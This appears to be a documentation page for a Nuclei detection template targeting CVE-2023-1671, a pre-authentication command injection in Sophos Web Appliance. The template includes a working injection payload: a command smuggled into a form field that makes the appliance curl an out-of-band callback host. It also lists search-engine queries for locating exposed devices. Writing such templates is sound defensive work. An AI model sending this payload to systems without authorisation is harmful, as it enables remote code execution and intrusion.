Skip to content
Nuclei Templates

Sophos Web Appliance - Remote Code Execution

ID: CVE-2023-1671

Severity: critical

Author: Co5mos

Tags: cve2023,cve,packetstorm,rce,sophos,oast,kev

Description

Section titled “Description”

A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

YAML Source

Section titled “YAML Source”
id: CVE-2023-1671


info:
  name: Sophos Web Appliance - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.
  reference:
    - https://vulncheck.com/blog/cve-2023-1671-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1671
    - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
    - https://github.com/lions2012/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1671
    cwe-id: CWE-77
    epss-score: 0.96909
    epss-percentile: 0.99711
    cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: web_appliance
    shodan-query:
      - title:"Sophos Web Appliance"
      - http.title:"sophos web appliance"
      - http.favicon.hash:-893681401
    fofa-query:
      - title="Sophos Web Appliance"
      - title="sophos web appliance"
      - icon_hash=-893681401
    google-query: intitle:"sophos web appliance"
  tags: cve2023,cve,packetstorm,rce,sophos,oast,kev


http:
  - raw:
      - |
        POST /index.php?c=blocked&action=continue HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 490a0046304402202f626755b77ffa0ea2f0d42d5befc584343f73edc0842d1f480ca8122e28f00802207cba3f09ee6b13ae80452e4a65da7e83721a3991095ab7ff4f8639c3394ebf94:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1671.yaml"

View on Github